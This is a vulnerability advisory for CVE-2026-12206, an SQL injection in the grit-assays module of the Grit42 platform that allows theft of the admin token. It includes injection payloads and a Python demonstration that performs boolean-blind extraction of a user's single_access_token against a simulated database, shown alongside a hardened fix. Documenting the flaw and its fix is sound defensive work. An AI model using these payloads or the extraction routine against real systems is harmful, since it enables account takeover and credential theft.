VYPR
Medium severity (CVSS 6.3) · NVD Advisory · Published Jun 15, 2026

CVE-2026-12206

Description

SQL injection in Grit42 grit-assays DataTableEntity allows authenticated attackers to extract admin tokens and achieve full account takeover.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A SQL injection vulnerability exists in the Grit42 grit platform versions 0.8.0 through 0.11.0, specifically in the Grit::Assays::DataTableEntity model within the file modules/assays/backend/app/models/grit/assays/data_table_entity.rb. The detailed and available class methods interpolate the user-supplied params[:data_table_id] directly into a Rails .joins(string) clause without sanitization. A preceding DataTable.find(params[:data_table_id]) call does coerce the value to an integer (Ruby's to_i semantics, so "1 OR 1=1" resolves to record 1 and the lookup succeeds), but the original, unmodified string is then passed into the JOIN, which is what enables subquery-based injection. The sink was introduced in commit ecb9a7f [1].

Exploitation

An attacker must have an active authenticated session on the grit platform; any account suffices, including one with no roles assigned. The endpoint is GET /api/grit/assays/data_table_entities?data_table_id=&scope=detailed (or any scope that invokes the vulnerable methods). A payload such as 1 OR 1=1 confirms the injection, after which the attacker appends subqueries to the JOIN ON clause and uses the presence or absence of result rows as a boolean-blind oracle, recovering values such as the administrator's single_access_token from the grit_core_users table one character at a time. The exploit is publicly available [1].

Impact

A successful attack allows the attacker to extract the administrator's single_access_token, which can be replayed as a permanent Authorization: Bearer credential, leading to full administrator account takeover. The same SQL injection primitive can read any other column the database role can see, including hashed passwords, password-reset tokens, activation tokens, and second-factor tokens, resulting in complete compromise of authentication and sensitive data disclosure [1].

Mitigation

The vendor (grit42) was contacted but did not respond, and no official patch has been released as of the CVE publication date (2026-06-15). Until one is available, restrict access to the vulnerable endpoint via network controls or web application firewall (WAF) rules (treat these as stopgaps; a WAF will not reliably block every encoding of a subquery), or disable the grit-assays module if it is not essential. Apply a patched version as soon as the vendor releases one [1].

AI Insight generated on Jun 15, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

Root cause

"User-controlled `params[:data_table_id]` is interpolated directly into a raw SQL string passed to Rails' `.joins()` without sanitization, enabling boolean-blind SQL injection."

Attack vector

An authenticated attacker with any active grit account (including zero-role accounts) sends a crafted `data_table_id` parameter to the `GET /api/grit/assays/data_table_entities` endpoint. Because the model declares `entity_crud_with read: []`, no role check is enforced, so even the lowest-privilege user can reach the sink [1]. The attacker appends boolean-blind SQL subqueries to the JOIN ON clause, enabling byte-by-byte extraction of any column the database role can see, such as the administrator's `single_access_token` [CWE-89].

Affected code

The vulnerability resides in `modules/assays/backend/app/models/grit/assays/data_table_entity.rb`, specifically in the `self.detailed` and `self.available` class methods at lines 46 and 56. These methods interpolate the user-controlled `params[:data_table_id]` directly into a raw SQL string passed to Rails' `.joins()` call, bypassing ActiveRecord's SQL protections.

What the fix does

The advisory recommends converting `params[:data_table_id]` to an integer via `.to_i` before interpolation, matching the integer coercion already performed by the upstream `DataTable.find()` call [1]. This prevents any non-numeric payload from being embedded in the raw SQL JOIN clause; a value with no leading digits becomes 0, which the preceding `find` rejects with `RecordNotFound` before the JOIN is built. The same `.to_i` fix must be applied in both the `detailed` and `available` class methods. Note that coercing and then interpolating is the minimal fix; passing the value as a bound parameter (for example through `sanitize_sql_array`) rather than building the JOIN string by hand is the more robust form and removes the interpolation sink entirely.
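To make the mechanism and the fix concrete, the following is an added example written for this page; it is not code from the grit project or from the cited reference. It models, in Python against an in-memory SQLite database, the flow described under Vulnerability, Exploitation and Attack vector: an integer-cast `find` that passes, followed by the original string being interpolated into the JOIN, and then the boolean-blind extraction of `single_access_token` from `grit_core_users`. It also shows the hardened form the advisory recommends. The real target is a Rails ActiveRecord model on a relational database; the exact JOIN text, the table names other than `grit_core_users`, the column set and the seeded token are all assumptions made for this example.

```python
import re
import sqlite3

# Constructed sample data for this example (not from the advisory): one admin
# user with a single_access_token, one data table and one entity row.
ADMIN_TOKEN = "a3f9Kq2ZpL0x"


def ruby_to_i(value):
    """Mimic Ruby String#to_i: parse a leading integer, otherwise 0.
    This is why DataTable.find("1 AND (...)") still resolves record 1."""
    m = re.match(r"\s*([+-]?\d+)", str(value))
    return int(m.group(1)) if m else 0


def build_db():
    conn = sqlite3.connect(":memory:")
    # grit_core_users / single_access_token are named in the advisory; the
    # other two table names are assumptions made for this example.
    conn.executescript("""
        CREATE TABLE grit_core_users (
            id INTEGER PRIMARY KEY, login TEXT, single_access_token TEXT);
        CREATE TABLE grit_assays_data_tables (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE grit_assays_data_table_entities (
            id INTEGER PRIMARY KEY, data_table_id INTEGER, entity_id INTEGER);
        INSERT INTO grit_assays_data_tables VALUES (1, 'plate 1');
        INSERT INTO grit_assays_data_table_entities VALUES (1, 1, 42);
    """)
    conn.execute("INSERT INTO grit_core_users VALUES (1, 'admin', ?)", (ADMIN_TOKEN,))
    return conn


def _find_data_table(conn, data_table_id):
    # Models DataTable.find(params[:data_table_id]): integer-cast, so it passes.
    coerced = ruby_to_i(data_table_id)
    if conn.execute("SELECT 1 FROM grit_assays_data_tables WHERE id = ?",
                    (coerced,)).fetchone() is None:
        raise LookupError("ActiveRecord::RecordNotFound")
    return coerced


def vulnerable_detailed(conn, data_table_id):
    """Models the vulnerable DataTableEntity.detailed flow (hypothetical JOIN
    shape). The bug is the pattern: the ORIGINAL string reaches .joins()."""
    _find_data_table(conn, data_table_id)
    sql = ("SELECT e.id, e.entity_id FROM grit_assays_data_table_entities e "
           "INNER JOIN grit_assays_data_tables dt "
           f"ON dt.id = e.data_table_id AND dt.id = {data_table_id}")  # sink
    return conn.execute(sql).fetchall()


def hardened_detailed(conn, data_table_id):
    """The advisory's fix is to coerce with .to_i before the SQL is built;
    binding the coerced value as a parameter (shown here) is the idiomatic form."""
    coerced = _find_data_table(conn, data_table_id)
    sql = ("SELECT e.id, e.entity_id FROM grit_assays_data_table_entities e "
           "INNER JOIN grit_assays_data_tables dt "
           "ON dt.id = e.data_table_id AND dt.id = ?")
    return conn.execute(sql, (coerced,)).fetchall()


def extract_blind(conn, login="admin", max_len=64):
    """Boolean-blind extraction: each oracle call is one request whose payload
    is '1 AND (<condition>)'; rows come back iff the condition is true.
    Returns (token, number_of_oracle_calls)."""
    calls = 0
    col = f"(SELECT single_access_token FROM grit_core_users WHERE login = '{login}')"

    def oracle(condition):
        nonlocal calls
        calls += 1
        return len(vulnerable_detailed(conn, f"1 AND ({condition})")) > 0

    def bisect(lo, hi, make_condition):
        # Find the smallest x in [lo, hi] for which "value > x" is false, i.e. the value.
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(make_condition(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = bisect(0, max_len, lambda m: f"length({col}) > {m}")
    # Printable ASCII code points 32..126; PostgreSQL would use ascii() instead of unicode().
    chars = [chr(bisect(32, 126, lambda m, i=i: f"unicode(substr({col}, {i}, 1)) > {m}"))
             for i in range(1, length + 1)]
    return "".join(chars), calls


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, payload '1 AND (1=0)':", vulnerable_detailed(db, "1 AND (1=0)"))
    print("hardened,   payload '1 AND (1=0)':", hardened_detailed(db, "1 AND (1=0)"))
    print("blind extraction:", extract_blind(db))
```

Each oracle call corresponds to one HTTP request in the real attack; bisecting on the code point costs about seven requests per character plus a handful to learn the length, which is why a blind injection behind an authenticated endpoint still yields a bearer token within a few hundred requests. Against the hardened variant the same `1 AND (1=0)` payload simply returns data table 1's rows, so the oracle no longer exists.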

Preconditions

  • Auth: the attacker must have an authenticated session on a running grit instance (any role level, including zero-role accounts, is sufficient).
  • Config: at least one DataTable record must exist in the database (present in any deployment using grit for its intended purpose).
  • Network: the endpoint must be reachable over HTTP/HTTPS.
  • Input: the attacker supplies a crafted `data_table_id` query parameter containing SQL injection payloads.

References: 5